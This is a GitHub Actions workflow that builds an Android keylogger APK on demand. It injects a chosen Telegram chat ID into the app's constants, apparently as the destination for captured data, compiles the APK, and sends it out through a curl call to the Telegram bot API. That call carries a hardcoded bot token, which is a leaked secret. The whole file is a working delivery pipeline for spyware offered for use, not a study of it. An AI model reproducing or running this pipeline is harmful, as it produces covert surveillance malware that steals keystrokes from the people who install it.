name: Build APK

on:
  workflow_dispatch:
    inputs:
      chat_id:
        description: 'Telegram Chat ID'
        required: true

jobs:
  build:
    runs-on: ubuntu-22.04  # Explicitly using Ubuntu 22.04

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Set up JDK
      uses: actions/setup-java@v3
      with:
        java-version: '17'  # Set to Java 17 as required by Android Gradle Plugin
        distribution: 'zulu'  # Use Zulu OpenJDK

    - name: Set executable permissions for gradlew
      run: chmod +x Android-Keylogger/AndroidKeylogger/gradlew  # Ensure gradlew is executable

    - name: Inject Chat ID into Constants.java
      run: sed -i 's/CHAT_ID_PLACEHOLDER/${{ github.event.inputs.chat_id }}/g' Android-Keylogger/AndroidKeylogger/app/src/main/java/com/bshu2/androidkeylogger/Constant.java
      # This step replaces the CHAT_ID_PLACEHOLDER in Constant.java with the chat_id input

    - name: Build APK
      run: Android-Keylogger/AndroidKeylogger/gradlew assembleDebug  # Build the APK using Gradle
      working-directory: Android-Keylogger/AndroidKeylogger

    - name: Upload APK as Artifact
      uses: actions/upload-artifact@v3
      with:
        name: user-apk  # Name of the artifact to upload
        path: Android-Keylogger/AndroidKeylogger/app/build/outputs/apk/debug/app-debug.apk  # Path to the generated APK

    - name: Send APK to Telegram
      run: |
        curl -F "chat_id=${{ github.event.inputs.chat_id }}" \
             -F "document=@Android-Keylogger/AndroidKeylogger/app/build/outputs/apk/debug/app-debug.apk" \
             https://api.telegram.org/bot8178078713:AAGOSCn4KEuvXC64xXhDrZjwQZmIy33gfaI/sendDocument
